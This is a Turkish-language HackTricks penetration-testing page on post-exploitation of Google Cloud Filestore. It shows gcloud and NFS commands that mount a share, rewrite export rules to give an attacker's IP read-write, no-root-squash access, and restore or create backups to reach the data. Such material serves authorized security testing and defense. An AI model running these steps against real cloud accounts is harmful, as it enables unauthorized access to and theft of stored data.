GCP - Filestore Post Exploitation

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!

HackTricks'i desteklemenin diğer yolları:

Filestore

Filestore hakkında daha fazla bilgi için kontrol edin:

GCP - Filestore Enum

Filestore Bağlama

Paylaşılan bir dosya sistemi, bir saldırganın perspektifinden ilginç olabilecek hassas bilgiler içerebilir. Filestore'a erişim sağlandığında, onu bağlamak mümkündür:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Bir dosya depolama örneğinin IP adresini bulmak için sayfanın numaralandırma bölümüne bakın:

GCP - Filestore Enum

Kısıtlamaları Kaldırın ve Ek İzinler Alın

Saldırgan, paylaşıma erişimi olan bir IP adresinde değilse, ancak değiştirmek için yeterli izne sahipse, kısıtlamaları veya erişimi kaldırmak mümkündür. Ayrıca, IP adresiniz üzerinde daha fazla ayrıcalık vererek paylaşıma yönetici erişimi elde etmek de mümkündür:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Bir yedeklemeyi geri yükle

Eğer bir yedekleme varsa, mevcut bir örneğe veya yeni bir örneğe geri yüklemek mümkündür, böylece bilgiler erişilebilir hale gelir:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Yedek oluşturun ve geri yükleyin

Eğer bir paylaşıma erişiminiz yoksa ve değiştirmek istemiyorsanız, onun bir yedeğini oluşturmak ve daha önce bahsedildiği gibi geri yüklemek mümkündür:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Last updated